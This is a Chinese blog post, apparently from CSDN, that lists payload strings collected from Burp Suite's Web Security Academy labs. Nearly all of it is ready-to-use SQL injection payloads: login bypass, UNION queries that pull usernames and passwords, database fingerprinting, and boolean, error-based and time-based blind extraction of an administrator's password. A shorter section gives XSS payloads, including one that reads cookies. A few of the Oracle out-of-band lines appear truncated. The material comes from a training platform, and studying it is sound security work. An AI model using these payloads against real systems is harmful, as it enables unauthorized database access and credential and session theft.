• 整理的burp官网的漏洞语句

    一、SQL注入

    where从句
    '+OR+1=1--
    登录绕过
    administrator'--
    union从句
    '+UNION+SELECT+NULL--
    '+UNION+SELECT+NULL,NULL--
    '+UNION+SELECT+'abcdef',NULL,NULL--
    '+UNION+SELECT+'abc','def'--
    '+UNION+SELECT+username,+password+FROM+users--
    '+UNION+SELECT+NULL,'abc'--
    '+UNION+SELECT+NULL,username||'~'||password+FROM+users--
    查询数据库类型
    '+UNION+SELECT+'abc','def'+FROM+dual--
    '+UNION+SELECT+BANNER,+NULL+FROM+v$version--
    '+UNION+SELECT+'abc','def'#
    '+UNION+SELECT+@@version,+NULL#
    列出数据库内容
    '+UNION+SELECT+'abc','def'--
    '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
    '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--
    '+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef--
    盲注
    TrackingId=xyz' AND '1'='1
    TrackingId=xyz' AND '1'='2
    TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>2)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>3)='a
    TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a
    TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='§a§
    TrackingId=xyz' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='administrator')='a

    TrackingId=xyz'
    TrackingId=xyz''
    TrackingId=xyz'||(SELECT '')||'
    TrackingId=xyz'||(SELECT '' FROM dual)||'
    TrackingId=xyz'||(SELECT '' FROM not-a-real-table)||'
    TrackingId=xyz'||(SELECT '' FROM users WHERE ROWNUM = 1)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>2 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>3 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,2,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    时间盲注
    TrackingId=x'||pg_sleep(10)--
    TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
    TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>3)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,2,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual--
    TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual--

    二、xss

    ">

    javascript:alert(document.cookie)

    "οnmοuseοver="alert(1)

    '-alert(1)-'

    product?productId=1&storeId=">

    {{$on.constructor('alert(1)')()}}

    \'-alert(1)//

    ${alert(1)}

  • 相关阅读:
    颜色的识别方法和探索 基于matlab
    简单而经典:Java中的冒泡排序算法详解
    Linux 重定向、管道命令 、环境变量PATH、权限理解
    (附源码)springboot美食分享系统 毕业设计 612231
    AIGC:【LLM(八)】——Baichuan2技术报告
    C++数据类型总结,看这一篇就够了
    如何轻松打造属于自己的水印相机小程序?
    URI 和 URL
    TDengine小知识-数据文件命名规则
    【广州华锐互动】VR溺水预防教育:在虚拟世界中学会自救!
  • 原文地址:https://blog.csdn.net/tainqiuer123/article/details/125887065